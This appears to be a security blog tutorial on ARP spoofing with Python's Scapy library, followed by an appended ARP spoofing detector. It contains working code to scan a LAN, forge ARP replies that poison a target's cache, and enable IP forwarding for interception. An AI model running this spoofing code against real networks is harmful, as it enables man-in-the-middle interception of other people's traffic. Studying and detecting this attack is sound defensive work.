Blog | G5 Cyber Security

ARP Spoofing: A Scapy Guide

TL;DR

ARP spoofing tricks devices on a network into thinking your computer’s MAC address belongs to another device (like the router). This lets you intercept and potentially modify their traffic. Scapy is a powerful Python library that makes crafting and sending these fake ARP messages easy.

How Scapy Reroutes Traffic

  1. Understanding ARP
    • ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local network. When a device wants to send data, it uses ARP to find the physical address of the destination.
    • Normally, devices ask “Who has this IP?” and the owner responds with their MAC address.
  2. The Spoofing Process
    • Scapy lets you create fake ARP replies. These replies tell devices that *your* MAC address is associated with an IP address they’re trying to reach (e.g., the router).
    • When a device needs to send data to the router, it will now send it to your computer instead.
  3. Setting up Scapy

    You’ll need Python and Scapy installed. Use pip:

    pip install scapy

    On some systems, you might need to run Scapy with root/administrator privileges.

  4. Scanning the Network

    First, find the IP addresses and MAC addresses of devices on your network. Scapy can do this:

    from scapy.all import ARP, Ether, srp

    target_ip = "192.168.1.0/24"  # Replace with your network range
    # Broadcast an ARP "who-has" for every address in the range and wait up to 2 s for answers.
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target_ip)
    answered_list, unanswered_list = srp(arp_request, timeout=2, verbose=False)

    # summary() only prints and returns None, so read each (sent, received) pair directly.
    for _sent, received in answered_list:
        print(received.psrc, received.hwsrc)

    This code sends an ARP request to every address in the range and prints the IP and MAC of each device that replied.

  5. Crafting the Spoofing Packet

    Now, create the fake ARP reply. This example tells a target device that the router’s IP address belongs to your MAC address:

    from scapy.all import Ether, ARP, sendp

    gateway_ip = "192.168.1.1"         # Router IP
    gateway_mac = "AA:BB:CC:DD:EE:FF"  # Router MAC (from scan)
    my_mac = "11:22:33:44:55:66"       # Your MAC
    target_ip = "192.168.1.20"         # Device to poison (placeholder; take it from the scan)
    target_mac = "DE:AD:BE:EF:00:20"   # That device's MAC (placeholder; take it from the scan)

    # ARP reply (op=2, "is-at") addressed to the target, claiming the router's IP is at your MAC.
    packet = Ether(dst=target_mac) / ARP(op=2, pdst=target_ip, hwdst=target_mac,
                                         psrc=gateway_ip, hwsrc=my_mac)
    sendp(packet, verbose=False)

    Replace the IP and MAC addresses with your actual values.

  6. Sending the Spoofing Packet

    The sendp() function sends the crafted packet. This is where the rerouting happens. Repeat this for each target you want to spoof.

  7. Intercepting Traffic (Optional)

    To see intercepted traffic, enable IP forwarding on your system:

    sudo sysctl -w net.ipv4.ip_forward=1

    Then, use a packet sniffer like Wireshark to capture the data passing through your computer.

  8. Restoring the Network

    To undo the spoofing and restore normal network operation, send legitimate ARP replies:

    from scapy.all import Ether, ARP, sendp

    gateway_ip = "192.168.1.1"         # Router IP
    gateway_mac = "AA:BB:CC:DD:EE:FF"  # Router MAC (from scan)
    target_ip = "192.168.1.20"         # Poisoned device (placeholder; same value as above)
    target_mac = "DE:AD:BE:EF:00:20"   # That device's MAC (placeholder; same value as above)

    # Genuine mapping: tell the target the router's IP is back at the router's real MAC.
    packet = Ether(dst=target_mac) / ARP(op=2, pdst=target_ip, hwdst=target_mac,
                                         psrc=gateway_ip, hwsrc=gateway_mac)
    sendp(packet, count=3, verbose=False)  # repeat a few times so the cache entry is surely overwritten

    This tells the poisoned device that the router’s IP is associated with the router’s real MAC again, overwriting the spoofed entry in its ARP cache so your MAC is no longer associated with the router’s IP.

  9. Important Considerations
    • ARP spoofing can disrupt network connectivity. Use it responsibly and only on networks you own or have permission to test.
    • Modern cyber security measures often detect ARP spoofing attempts.
    • This is a simplified example; real-world attacks are more sophisticated.
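The detection mentioned above, as an added example that is not part of the original post: a small watcher that consumes ARP "is-at" replies and flags the two signatures this technique leaves, a known IP suddenly claimed by a different MAC, and one MAC answering for several IPs. The reply sequence is constructed here for illustration; the gateway and attacker addresses reuse the sample values from the post, the 192.168.1.20 host is an assumed extra device.

```python
from collections import namedtuple

# One ARP "is-at" reply as seen on the wire: the IP claimed and the MAC claiming it.
ArpReply = namedtuple("ArpReply", "psrc hwsrc")


class ArpWatch:
    """Track IP->MAC bindings and flag the two classic ARP spoofing signatures."""

    def __init__(self, trusted):
        # Seed with known-good bindings (e.g. the gateway) so the first poisoned
        # reply is caught rather than learned as the truth.
        self.ip_to_mac = {ip: mac.lower() for ip, mac in trusted.items()}
        self.mac_to_ips = {}
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips.setdefault(mac, set()).add(ip)
        self.alerts = []

    def observe(self, reply):
        """Return the alert strings this reply raises (empty list if benign)."""
        ip, mac = reply.psrc, reply.hwsrc.lower()
        found = []
        known = self.ip_to_mac.get(ip)
        if known is not None and known != mac:
            # Signature 1: an IP we already know is suddenly claimed by another MAC.
            found.append(f"binding change: {ip} was {known}, now claimed by {mac}")
        self.ip_to_mac.setdefault(ip, mac)  # learn only if the IP was unknown
        claimed = self.mac_to_ips.setdefault(mac, set())
        claimed.add(ip)
        if len(claimed) > 1:
            # Signature 2: one MAC answering for several IPs (e.g. gateway + itself).
            found.append(f"one MAC for many IPs: {mac} -> {sorted(claimed)}")
        self.alerts.extend(found)
        return found


def run_sample():
    """Feed a constructed reply sequence (not a real capture) through the watcher."""
    watch = ArpWatch({"192.168.1.1": "AA:BB:CC:DD:EE:FF"})  # trusted gateway binding
    replies = [
        ArpReply("192.168.1.1", "aa:bb:cc:dd:ee:ff"),   # genuine gateway reply
        ArpReply("192.168.1.20", "de:ad:be:ef:00:20"),  # assumed host announcing itself
        ArpReply("192.168.1.1", "11:22:33:44:55:66"),   # poisoned: gateway IP, other MAC
        ArpReply("192.168.1.10", "11:22:33:44:55:66"),  # same MAC also owns its real IP
    ]
    for reply in replies:
        watch.observe(reply)
    return watch.alerts
```

Live, the same watcher can be fed from scapy with sniff(filter="arp", store=False, prn=...), passing each reply's psrc and hwsrc to observe(); the static seeding is what lets it catch the very first poisoned reply rather than trusting it.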